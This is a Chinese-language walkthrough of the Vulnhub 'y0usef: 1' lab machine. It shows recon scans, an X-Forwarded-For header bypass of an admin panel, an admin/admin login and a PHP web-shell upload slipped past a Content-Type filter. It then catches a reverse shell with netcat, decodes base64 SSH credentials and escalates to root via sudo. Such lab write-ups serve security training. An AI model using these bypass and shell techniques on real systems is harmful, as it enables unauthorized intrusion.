首页 > 其他分享 >Vulnhub之Y0usef靶机详细测试过程

Vulnhub之Y0usef靶机详细测试过程

时间:2022-12-07 11:46:07浏览次数:40  
标签:http yousef Y0usef kali 192.168 56.247 Vulnhub 靶机 root

Y0usef

作者: jason_huawen

靶机基本信息

名称:y0usef: 1

地址:

https://www.vulnhub.com/entry/y0usef-1,624/

识别目标主机IP地址

(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.62.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:66:82:69      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.247  08:00:27:ca:39:d0      1      60  PCS Systemtechnik GmbH    

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.247

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.247 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-06 21:36 EST
Nmap scan report for localhost (192.168.56.247)
Host is up (0.00018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d8:e0:99:8c:76:f1:86:a3:ce:09:c8:19:a4:1d:c7:e1 (DSA)
|   2048 82:b0:20:bc:04:ea:3f:c2:cf:73:c3:d4:fa:b5:4b:47 (RSA)
|   256 03:4d:b0:70:4d:cf:5a:4a:87:c3:a5:ee:84:cc:aa:cc (ECDSA)
|_  256 64:cd:d0:af:6e:0d:20:13:01:96:3b:8d:16:3a:d6:1b (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Ubuntu)
MAC Address: 08:00:27:CA:39:D0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.35 seconds

NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ curl http://192.168.56.247                                     
<html>
<head>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" integrity="sha384-TX8t27EcRE3e/ihU7zmQxVncDAy5uIKz4rEkgIXeMed4M0jlfIDPvg6uqKI2xXr2" crossorigin="anonymous">

<body>
<div class="container-fluid">
<center class="mt-5">
<h1>Sorry , the site is under construction soon, it run </h1>
</center>
</div>
</body>
<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-ho+j7jyWK8fNQe+A12Hb8AhRq26LrZ/JpcUGGOn+Y7RsweNrtN/tE3MoK7ZeZDyx" crossorigin="anonymous"></script>
</head>
</html>                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ curl http://192.168.56.247/robots.txt                          
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.10 (Ubuntu) Server at 192.168.56.247 Port 80</address>
</body></html>
                                 

利用浏览器访问80端口,返回apache2默认页面,不存在robots.txt文件,接下来做一下目录扫描:

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ nikto -h http://192.168.56.247    
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.247
+ Target Hostname:    192.168.56.247
+ Target Port:        80
+ Start Time:         2022-12-06 21:40:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.29
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2022-12-06 21:41:29 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.247
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/06 21:39:13 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 302]
Progress: 218995 / 220561 (99.29%)===============================================================
2022/12/06 21:39:36 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.247
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,sh,txt
[+] Timeout:                 10s
===============================================================
2022/12/06 21:39:47 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 293]
/index.php            (Status: 200) [Size: 791]
/.html                (Status: 403) [Size: 294]
/.html                (Status: 403) [Size: 294]
/.php                 (Status: 403) [Size: 293]
/server-status        (Status: 403) [Size: 302]
Progress: 1102787 / 1102805 (100.00%)===============================================================
2022/12/06 21:41:55 Finished
===============================================================

到目前为止没有扫描出任何目录或者文件,可能是由于常规的扫描把一些状态码过滤掉了,而这些目录可能往往意味着需要认证,因此需要对gobuster工具指定返回状态码,以获得更多的信息:

200   (成功)  服务器已成功处理了请求。通常,这表示服务器提供了请求的网页。
204   (无内容)  服务器成功处理了请求,但没有返回任何内容。
301   (永久移动)  请求的网页已永久移动到新位置。服务器返回此响应(对 GET 或 HEAD 请求的响应)时,会自动将请求者转到新位置。
302   (临时移动)  服务器目前从不同位置的网页响应请求,但请求者应继续使用原有位置来进行以后的请求。
307   (临时重定向)  服务器目前从不同位置的网页响应请求,但请求者应继续使用原有位置来进行以后的请求。
401   (未授权)请求要求身份验证。对于需要登录的网页,服务器可能返回此响应。
──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,401
Error: error on parsing arguments: status-codes ("200,204,301,302,307,401") and status-codes-blacklist ("404") are both set - please set only one. status-codes-blacklist is set by default so you might want to disable it by supplying an empty string.
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,401 --status-codes-blacklist ''
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:            http://192.168.56.247
[+] Method:         GET
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   302,307,401,200,204,301
[+] User Agent:     gobuster/3.3
[+] Timeout:        10s
===============================================================
2022/12/06 21:50:43 Starting gobuster in directory enumeration mode
===============================================================
Progress: 219246 / 220561 (99.40%)===============================================================
2022/12/06 21:51:09 Finished
===============================================================

还是没有扫描出任何目录,需要更换字典:

──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -s 200,204,301,302,307,401 --status-codes-blacklist '' 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:            http://192.168.56.247
[+] Method:         GET
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Status codes:   200,204,301,302,307,401
[+] User Agent:     gobuster/3.3
[+] Timeout:        10s
===============================================================
2022/12/06 21:52:00 Starting gobuster in directory enumeration mode
===============================================================
/.                    (Status: 200) [Size: 791]
/adminstration        (Status: 301) [Size: 324] [--> http://192.168.56.247/adminstration/]
Progress: 118867 / 119601 (99.39%)===============================================================
2022/12/06 21:52:14 Finished
===============================================================

这次成功扫描出/administration目录,访问该目录,但是forbidden,这也证实了之前的猜测,继续扫描下级目录:

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247/adminstration/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -s 200,204,301,302,307,401 --status-codes-blacklist '' 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:            http://192.168.56.247/adminstration/
[+] Method:         GET
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Status codes:   204,301,302,307,401,200
[+] User Agent:     gobuster/3.3
[+] Timeout:        10s
===============================================================
2022/12/06 21:56:02 Starting gobuster in directory enumeration mode
===============================================================
/include              (Status: 301) [Size: 332] [--> http://192.168.56.247/adminstration/include/]
/logout               (Status: 301) [Size: 331] [--> http://192.168.56.247/adminstration/logout/]
/upload               (Status: 301) [Size: 331] [--> http://192.168.56.247/adminstration/upload/]
/users                (Status: 301) [Size: 330] [--> http://192.168.56.247/adminstration/users/]
/bootstrap            (Status: 301) [Size: 334] [--> http://192.168.56.247/adminstration/bootstrap/]

但是访问这些目录,此时没有报错或者禁止访问,但是没有内容,尝试添加指向本地的X-Forwarded-For header头进行bypass,用burpsuite拦截请求,添加X-Forwarded-For: localhost

此时访问/adminstration,可使用firefox浏览器的插件X-Forwarded-For Header对网页访问的过程添加有效的X-Forwarded-For header头,返回登录页面。

测试一下弱口令,发现是admin admin

接下来想办法将shell.php上传,但是返回file not allowed,需要bypass

发现用burpsuite拦截请求,修改content-type为image/jpg( image/jpeg都不行)

提示上传成功:file uploadad files/1670382468shell.php

访问该文件,获得shell:

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.247] 55915
Linux yousef-VirtualBox 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:08:14 UTC 2014 i686 i686 i686 GNU/Linux
 06:11:11 up 37 min,  0 users,  load average: 0.00, 0.13, 0.49
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@yousef-VirtualBox:/$ ls
ls
bin   cdrom  etc   initrd.img  lost+found  mnt  proc  run   srv  tmp  var
boot  dev    home  lib         media       opt  root  sbin  sys  usr  vmlinuz
www-data@yousef-VirtualBox:/$ cd home
cd home
www-data@yousef-VirtualBox:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  3 root   root   4.0K Dec  6  2020 .
drwxr-xr-x 22 root   root   4.0K Nov 25  2020 ..
-rw-r--r--  1 root   root     53 Dec  8  2020 user.txt
drwxr-xr-x 18 yousef yousef 4.0K Dec  8  2020 yousef
www-data@yousef-VirtualBox:/home$ cat user.txt
cat user.txt
c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=
www-data@yousef-VirtualBox:/home$ 

提权

在/home/yousef家目录中的user.txt,经过了bas64编码,将其解码:

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ echo 'c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=' | base64 -d            
ssh : 
user : yousef 
pass : yousef123                                                                                                                              

得到了用户yousef的密码, ssh登录该用户

┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ ssh [email protected]              
The authenticity of host '192.168.56.247 (192.168.56.247)' can't be established.
ED25519 key fingerprint is SHA256:J3OrMiuy5X+zdlTAYCltBBCNaN3bxTjPbQvtPR6QSzE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.247' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

778 packages can be updated.
482 updates are security updates.

Last login: Tue Dec  8 01:58:33 2020 from s
yousef@yousef-VirtualBox:~$ id
uid=1000(yousef) gid=1000(yousef) groups=1000(yousef),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
yousef@yousef-VirtualBox:~$ sudo -l
[sudo] password for yousef: 
Matching Defaults entries for yousef on yousef-VirtualBox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User yousef may run the following commands on yousef-VirtualBox:
    (ALL : ALL) ALL
yousef@yousef-VirtualBox:~$ sudo /bin/bash
root@yousef-VirtualBox:~# cd /root
root@yousef-VirtualBox:/root# ls -alh
total 24K
drwx------  2 root root 4.0K Dec  8  2020 .
drwxr-xr-x 22 root root 4.0K Nov 25  2020 ..
-rw-------  1 root root  235 Dec  8  2020 .bash_history
-rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-r--r--  1 root root  105 Dec  8  2020 root.txt
root@yousef-VirtualBox:/root# cat root.txt
WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx
root@yousef-VirtualBox:/root# 

得到了root shell,以及root flag.

经验教训

  1. 第一直接是正确的,因此NMAP扫描出来的结果只有22和80端口,那么突破口只能是在80端口。

  2. 常规的目录扫描如果没有结果,需要考虑是不是因为状态码被过滤掉了,因为某些目录如需要认证才能访问,因此需要添加相应的参数,这样才可能扫描出相应的结果,同时需要考虑更换字典。

  3. X-Forwarded-For插件可以用于修改浏览器的该字段(增加或者修改)

  4. 在做文件上传绕过时,注意观察正常可以上传文件时的各种表现,比如这次修改content-type,需要修改为image/jpg, 而image/jpeg不能正常上传

标签:http,yousef,Y0usef,kali,192.168,56.247,Vulnhub,靶机,root
From: https://www.cnblogs.com/jason-huawen/p/16962612.html

相关文章